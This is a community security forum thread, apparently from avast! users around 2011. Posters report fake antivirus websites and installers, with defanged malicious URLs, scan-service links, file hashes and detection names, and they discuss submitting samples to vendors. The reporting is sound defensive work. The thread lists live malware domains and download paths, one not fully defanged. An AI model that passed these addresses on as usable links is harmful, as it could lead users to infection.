voting in avast! Web Rep :)
and hope an avast! Virus Researcher may do the job.
-
I was going to save the file to send it, but was not sure if it would self execute after it was saved.
-
I was going to save the file to send it, but was not sure if it would self execute after it was saved.
Ok, sorry, my comment did seem rather offhand...I would actually be inclined not to encourage users not to try and get the file unless they really know what they are doing...
The best thing to do would be to report the site while it is still active, which would then allow those who are comfortable to get the file. :)
-
Malware writers recode everyday. There is no real purpose in posting this stuff. you can find all your malware links here.
http://malc0de.com/database/
http://www.malwaredomainlist.com/
-
If a rogue is reported, and submitted, and subsequently detected...protecting a user at some point or another then there is a purpose in posting...
-
Well both those sites can give you more info the one person posting a link. Avast should just look at both those sites.
-
You both have a point there, spg SCOTT and Dieselman,
The malcreants start out with launching a new morphed encrypted obfuscated protected version of the same malcreation. This is an ongoing battle between malcreant and the anti-malware makers....
So the cybercriminals test out their new malcreations for it to go under the anti-malware radar, right? What is adding detection for 0-days etc faster - re-scanning, re-scanning, re-scanning.
As soon as the undetected are flagged once protection against it is possible. So I think reporting flagged malware sites and new rogues to avast (and sending the info to virus AT avast dot com too), and posting it to be re-scanned is good. On the other hand this means protection "after the fact", the vulnerability gap is still there and stays open. How to close this further, deminish vulnaribilities used to infect by constantly updating the software of your OS and third party programs (secunia psi) and use sandboxing and script protection to be better protected even,
polonus
-
Another undetected fake av site: htxp://protectionantivscanxp.com/ with mdl_fake AV (these servers often also has zeus/mdl_trojan TDSS on them)...usally they are being taken down rather quickly,
IP initial: see: http://www.ipillion.com/ip/91.213.157.110
Reported there as such \"protectxpdriversvirusnow\" is a rogue antivirus site. I had a google redirection virus that kept directing me to that site. The virus apparently started with a \'tdl4 bootkit\', as reporte...
as such not detected: http://www.virustotal.com/file-scan/report.html?id=40842d6f11294476776c1609562b3d979bfd1cbc90b6fac8154a213bf51cfcf6-1298142836
Not detected here: http://wepawet.iseclab.org/domain.php?hash=4317a555e95fd113218c188fdd150b85&type=js
But found to be dangerous here on 4 instances:
flagged by http://global.sitesafety.trendmicro.com/
polonus
-
Another one here: htxp://dl.antivirus-antispy.cw.cm/BestAntivirus2011.exe
5 detections for this TR/ATRAPS.Gen, see
http://www.virustotal.com/file-scan/report.html?id=4361036cada809073bca9b8b56f5b2b59e795099d5f1b567a8a5abe873431ea9-1303139492
Avast does not detect yet,
polonus
-
Another one here: htxp://dl.antivirus-antispy.cw.cm/BestAntivirus2011.exe
5 detections for this TR/ATRAPS.Gen, see
http://www.virustotal.com/file-scan/report.html?id=4361036cada809073bca9b8b56f5b2b59e795099d5f1b567a8a5abe873431ea9-1303139492
Avast does not detect yet,
polonus
You use malwaredomainlist,don't you? ;)
-
malc0de is also another great site for malware links.
http://malc0de.com/database/
-
Hi Dieselman,
We are not given these sites here, because the unaware can get themselves infected, why do you post it then?
Make it htxp please. Same goes for others, unaware users should not be go there unprotected, just as with jsunpack etc. etc.
polonus
-
Please read the link and the site before you comment. MalcOde is NOT a malicious site. It's just like Malware Domain List. Mac0de posts links to malicious sites for testing purposes but the site it self is safe. Direct links to malicious sites should be coded with hxxp. But this is not a direct link. Clicking on the malc0de link will NOT directly get you infected. You are posting direct links. I on the other hand are not. Thanks.
-
Warning notice from MDL.
WARNING: All domains on this website should be considered dangerous. If you do
not know what you are doing here, it is recommended you leave right away. This
website is a resource for security professionals and enthusiasts
-
This looks like a new site for the Antispy2011.exe
hxxp:Memoryscannerprotectionwin.com
Got redirected to that site on another website not to long ago
-
Another Fake-av site hxxp://mbr-antivirus.ce.ms/fast-scan/
-
Another Fake-av site hxxp://mbr-antivirus.ce.ms/fast-scan/
Stopped by ClearCloud DNS.
-
This looks like a new site for the Antispy2011.exe
hxxp:Memoryscannerprotectionwin.com
Got redirected to that site on another website not to long ago
Link is dead.
-
I wonder if the people doing the fake AV sites are looking on this forum, seems odd the links go down as soon as someone mentions them.
This one is more recent:
hxxp:documentscannerprotectionwin.com
-
I wonder if the people doing the fake AV sites are looking on this forum, seems odd the links go down as soon as someone mentions them,
Most likely it would be gone regardless of what is posted here.
People behind these rogues are criminal ***wipes to whom I would love to introduce my self (in the most physical manner possible).
I'd love to call them stupid, but that would be false. They are savvy, and know how to stay on the move.
-
It looks like it is the same people. The "Scare" site always shows up as the same and tries to get you to install a program called Antispy2011.exe
I got no idea which Ad/Banners are doing it though
-
I went to the link again to see if it was down or up.. and it is up.. but the virus tried to install on my pc! but avast blocked the virus from downloading! Thank you so much avast! :)
-
Hi folks,
This one also not detected at VT:
hxtp://antivirus-program-2011.ce.ms/fast-scan
VT scan: http://www.virustotal.com/url-scan/report.html?id=9fa26859f2d3ca0d5485e60aeecf622f-1303732030
VT file scan:
http://www.virustotal.com/file-scan/report.html?id=8445f95b1231d462f181ce570023c501a3046a571e224947757d886f6f8095e1-1303739616
Strange to be found benign here: http://wepawet.iseclab.org/view.php?hash=9fa26859f2d3ca0d5485e60aeecf622f&t=1303739892&type=js
obfuscated and wrapped-protected online (see big chunk of obfuscated code)
see WOT warning: http://www.webutation.net/go/review/antivirus-program-2011.ce.ms
polonus
-
Hi folks,
This one also not detected at VT:
hxtp://antivirus-program-2011.ce.ms/fast-scan
VT scan: http://www.virustotal.com/url-scan/report.html?id=9fa26859f2d3ca0d5485e60aeecf622f-1303732030
VT file scan:
http://www.virustotal.com/file-scan/report.html?id=8445f95b1231d462f181ce570023c501a3046a571e224947757d886f6f8095e1-1303739616
Strange to be found benign here: http://wepawet.iseclab.org/view.php?hash=9fa26859f2d3ca0d5485e60aeecf622f&t=1303739892&type=js
obfuscated and wrapped-protected online (see big chunk of obfuscated code)
see WOT warning: http://www.webutation.net/go/review/antivirus-program-2011.ce.ms
polonus
and the Rogue is only detected by Prevx
http://www.virustotal.com/file-scan/report.html?id=9e05babb97a2bc788887e8c7fe63a8c3be1e12d6a89adb4102ca4f0825fa937e-1303743574
Malwarebytes detect it as - Trojan.FakeAlert.PGen
sample sendt avast ;) and SUPERAntiSpyware
-
Hi Pondus,
We are right on it, man, Kaspersky now also detects this as HEUR:Trojan.Win32.Generic,
see for the newer scan results:
http://www.virustotal.com/file-scan/report.html?id=9e05babb97a2bc788887e8c7fe63a8c3be1e12d6a89adb4102ca4f0825fa937e-1303743685 2 /42 (4.8%)
pol
P.S. We need to have this detection added, because this malware is destructive to system 32 files and then computer will not start up anymore, meaning a re-install,
D
-
and Norman but signature is not released yet - Already detected as W32/Crypt.AVFO
-
Hi Pondus,
Another one not detected by avast and norman:
Fave av at hxtp://getip-string02.tk/
VT scan: http://www.virustotal.com/url-scan/report.html?id=7e7ce8aa583331ce372ae657dae41a69-1303831762
detected by Bitdefender...
VT file scan: http://www.virustotal.com/file-scan/report.html?id=465186de9157139f2197a618cda2c461790fa5c52ec3ab68dcc114deb180f7df-1303839353 3/ 41 (7.3%)
polonus
-
and not detected by Malwarebytes
will send sample ;)
EDIT: the rogue is detected by avast
http://www.virustotal.com/file-scan/report.html?id=779abf32ddcad236c09d9937b988332ee4631990a76cd1ac7ca0087a4e9dc08d-1303839832
-
Is this a fake av? Scanned here: http://wepawet.iseclab.org/view.php?hash=3387298540e82cf340508865a49b26b8&t=1303856097&type=js
VT url analysis: http://www.virustotal.com/url-scan/report.html?id=3387298540e82cf340508865a49b26b8-1303849006
VT file analysis: http://www.virustotal.com/file-scan/report.html?id=4193f2ef35f027d3947705aab2aa6f8e8aeb84220d9383123d3f48f063ed0da3-1303856209 not detected
See: http://vscan.urlvoid.com/file/bdd6fcfdfc7b324724e5a101c7c3b908/YWxlcnRzLWNsaWVudC1hbGVydHNjbGllbnQtc2gt/
Detected as dangerous site on 3 instances: http://www.urlvoid.com/scan/instantspywareremoval.com
polonus
-
Is this a fake av? Scanned here: http://wepawet.iseclab.org/view.php?hash=3387298540e82cf340508865a49b26b8&t=1303856097&type=js
VT url analysis: http://www.virustotal.com/url-scan/report.html?id=3387298540e82cf340508865a49b26b8-1303849006
VT file analysis: http://www.virustotal.com/file-scan/report.html?id=4193f2ef35f027d3947705aab2aa6f8e8aeb84220d9383123d3f48f063ed0da3-1303856209 not detected
See: http://vscan.urlvoid.com/file/bdd6fcfdfc7b324724e5a101c7c3b908/YWxlcnRzLWNsaWVudC1hbGVydHNjbGllbnQtc2gt/
Detected as dangerous site on 3 instances: http://www.urlvoid.com/scan/instantspywareremoval.com
polonus
Polonus I have a quick question.. If i got a pop up to donwload the program on instantspywareremoval does that mean i have a virus? or is the program safe?
-
Is this a fake av? Scanned here: http://wepawet.iseclab.org/view.php?hash=3387298540e82cf340508865a49b26b8&t=1303856097&type=js
VT url analysis: http://www.virustotal.com/url-scan/report.html?id=3387298540e82cf340508865a49b26b8-1303849006
VT file analysis: http://www.virustotal.com/file-scan/report.html?id=4193f2ef35f027d3947705aab2aa6f8e8aeb84220d9383123d3f48f063ed0da3-1303856209 not detected
See: http://vscan.urlvoid.com/file/bdd6fcfdfc7b324724e5a101c7c3b908/YWxlcnRzLWNsaWVudC1hbGVydHNjbGllbnQtc2gt/
Detected as dangerous site on 3 instances: http://www.urlvoid.com/scan/instantspywareremoval.com
polonus
The Website you listed looks like it wants people to download PCSafeDoctor. I searched google and found a website that has PCSafedoctor on it also. hxxp://www.pcsafedoctor.com/ I wonder if the program is malware or Not
-
you may ask in Malwarebytes form....they usually know...if not they are quick to find out
-
Concerning pcsafedoctor, re: http://www.mywot.com/en/forum/11030-pcsafedoctor
polonus
-
My friend on twitter Asked @Microsofthelps about instantspywareremoval site and Here is their tweet about the program.
http://twitter.com/#!/MicrosoftHelps/status/63258439857602560
-
Is this a fake av? Scanned here: http://wepawet.iseclab.org/view.php?hash=3387298540e82cf340508865a49b26b8&t=1303856097&type=js
VT url analysis: http://www.virustotal.com/url-scan/report.html?id=3387298540e82cf340508865a49b26b8-1303849006
VT file analysis: http://www.virustotal.com/file-scan/report.html?id=4193f2ef35f027d3947705aab2aa6f8e8aeb84220d9383123d3f48f063ed0da3-1303856209 not detected
See: http://vscan.urlvoid.com/file/bdd6fcfdfc7b324724e5a101c7c3b908/YWxlcnRzLWNsaWVudC1hbGVydHNjbGllbnQtc2gt/
Detected as dangerous site on 3 instances: http://www.urlvoid.com/scan/instantspywareremoval.com
polonus
The Website you listed looks like it wants people to download PCSafeDoctor. I searched google and found a website that has PCSafedoctor on it also. hxxp://www.pcsafedoctor.com/ I wonder if the program is malware or Not
You will never be infect by downloading a malware to your computer, the only way that it can infect your computer is if you executed the application. You can save all malwares you want to one folder in your computer, and you won't be infected. You can visit a exploited web site (fake av warnings in this case) and the site tell you that it found infected files in your computer, but these warnings are fake and your computer is not infected really. Of course, there are exploits that are able to infect you without your concern, this happen when you have your programs and OS out of date. These opportunities are known as "vulnerabilities".
-
Hi Llanziek,
Read this here: PCSafeDoctor - http://www.mywot.com/en/forum/11030-pcsafedoctor
The program can detect but for cleansing you need a paid version,
polonus
-
Hi Llanziek,
Read this here: PCSafeDoctor - http://www.mywot.com/en/forum/11030-pcsafedoctor
The program can detect but for cleansing you need a paid version,
polonus
That's right. I experienced similar situations with AdwareAlert and SpywareCease. The difference among fake av applications is that some are less annoying. And some not take complete control of computer(like above mentioned, convincing people that the application is safe and real).
-
Most of the ones i have been getting are targeted for Windows XP/Vista
-
See: http://wepawet.iseclab.org/view.php?hash=7ba4727cec0c40dde931c239ccb66e72&t=1304424653&type=js
Nothing detected....
From the same domain: Trojan FakeAlert. Rogue AV ' Security Shield ', see:
VT scan: http://www.virustotal.com/file-scan/report.html?id=8ed62f6f3bed2e23d1eec91ab1d85c9078423bbcea89b3a80b91669444e1e842-1304338934 aka variant of Win32/Kryptik.NGV
see: http://vscan.urlvoid.com/file/3cb045915778215e2fced65afb8434d7/aW5kZXgtcGhw/
decode error on file download....f608b4d5a024e24c409a44da09262497 194 bytes...
polonus
-
First the VT scans: http://www.virustotal.com/url-scan/report.html?id=622c3c5f1eae6092b6615ddd6a0fd2d0-1305572964
accompanying file scan: http://www.virustotal.com/file-scan/report.html?id=25d2f1db7ea4c2d45daed3aa23cb6dd4851b486bfc41e597af8441be2cbd4e62-1305580168 *
Wepawet scan gives suspicious result: http://wepawet.iseclab.org/view.php?hash=622c3c5f1eae6092b6615ddd6a0fd2d0&t=1305580186&type=js
and the resulting Anubis report link: http://anubis.iseclab.org/?action=result&task_id=1ffa81154a0026d74659bfc1da253c252
But also could be the protection UPX packer being heuristically flagged by 2 scanners, see *,
here given clean: http://www.garyshood.com/virus/results.php?r=12881e2b85f03b0893835d8dc1c5ed68
polonus
sent to virus AT avast com
-
So it is malware that avast did not detect: http://www.virustotal.com/file-scan/report.html?id=25d2f1db7ea4c2d45daed3aa23cb6dd4851b486bfc41e597af8441be2cbd4e62-1305690639 now 8 /43 (18.6%)
polonus
-
Not detected:
VT scan: http://www.virustotal.com/url-scan/report.html?id=2a37a186624613ebfc6eae65b4c50e14-1306520738
VT analysis: http://www.virustotal.com/file-scan/report.html?id=5cfb502b24551e7755dccc39441ea316291a5071936f496e618433b5d1d5f90f-1306528482
SOSWebscan: Main URL: -http://baner-itaddress.tk/scanner15/?afid=156 is suspicious.
See: http://wepawet.iseclab.org/view.php?hash=2a37a186624613ebfc6eae65b4c50e14&t=1306528646&type=js
Fake App Attack: Misleading Application Suspicious Notification, see:
http://www.urlvoid.com/scan/baner-itaddress.tk (dangerous)
Sent to virus AT avast dot com
polonus
-
Another Fake-AV redirect, see attached image of the wepawet scan.
Not detected by VT, flagged here: http://safeweb.norton.com/report/show?name=eikona.info
abuse at godaddy.com 184.168.204.1 (rogue campaign since mid January of this year)
polonus
-
something must be removed as i get no redirect to FakeAV scan with opera/IE8
-
Hi Pondus,
Maybe that is why the SOSWebScan came up clean, also this: http://www.google.com/safebrowsing/diagnostic?site=eikona.info
or the download went nowhere?
polonus
But what about the eval div_ hack?
D
-
Avast! Blocks the installer of SystemTool but not the website.
hxxp://systemtoolonline.com/ <--- SystemTool (Avast Detects the Installer as Win32:MalOb-EJ(Cryp)
-
Hi Coolmario88cp,
This concerns a rogue TREND MICRO antivirus site. Presumably malicious,
polonus
-
Fake AV not detected
FastAntivirus2011.exe
http://www.virustotal.com/file-scan/report.html?id=e4c877b4d86b15f3d74bd974cb1abe8d057fb9721bfa34eb146f7bcf7e5fb4d7-1307221293
Detected by Malwarebytes - Trojan.FakeAlert
Not detected by Superantispyware
will be in avast! and SAS inbox soon ;)
-
one more
test_severyan_sdhkjwg.exe
http://www.virustotal.com/file-scan/report.html?id=3ef9d4551d97fc72384e53d2b3741c74e44b547ca924be9f57fd1220bf8c8b33-1307223768
Detected by Malwarebytes - Trojan.FakeAlert
Not detected by Superantispyware
-
Hi Pondus,
That is a rather new one with two detections, ViCheck.ca has it
It is a revival of malware last seen 2010-10-29 now at Portlane dot network
MD5 hash e5c2bcdaf4efec616469d1f307ac5c49
VT results then: http://www.virustotal.com/file-scan/report.html?id=ddd41cb48e8d132e081dcfa04d77369dfd2827d75cba6d14fd92f32aa819675f-1288376959
New detections from 193 dot 105 dot 134 dot 192 IP=on
ever so many versions, most recent : md5=1b3a4d15224fbc89b05accea481f1e7e
md5=158336212ed8607fd1b73921b8d7d8e9
md5=3e53b7a015b5be059393f38ca71216d7
They launch three new ones every day, see also: http://info.prevx.com/aboutprogramtext.asp?PX5=1DEFB0A300A1DC14AAB7034A9D84B5004CDB5185
polonus
-
Detected only by GData at VT and SOSWebScan: http://www.virustotal.com/url-scan/report.html?id=b7cc4dc35569f5f9d3f1da92bb844111-1307540248 Trojan Fake AV
See VT file scan here: http://www.virustotal.com/file-scan/report.html?id=48d1a9554f5403d27d2013f4d833b378b30d944720b70776b5e9d694dc320b9e-1307547950
polonus
-
that is our friend Freesystemscan again...he have been very active for the last weeks
freesystemscan.exe - 6/43
http://www.virustotal.com/file-scan/report.html?id=8e6e3ef280e00b3cff1f5117d185407d4660c20adc2345d93d8f05ccae6d1856-1307561903
Malwarebytes detect as - Rogue.FakeMSE
-
Hi Pondus,
Here is the ThreatExpert report for the one you mentioned: http://www.threatexpert.com/report.aspx?md5=6a98f83a7b1e05af8235d9b407fce86f
polonus
-
Rogue.Agent/Gen-Nullo[EXE] (trojan dropper) not detected, see VT results:
http://www.virustotal.com/url-scan/report.html?id=ebc150c20ba3ca3827b0af0959f1129f-1308060320
&
http://www.virustotal.com/file-scan/report.html?id=8bdd8ffa4b776e26935f59e5c582ab627ed0953e8975aea918c074ce97db5801-1308067991
polonus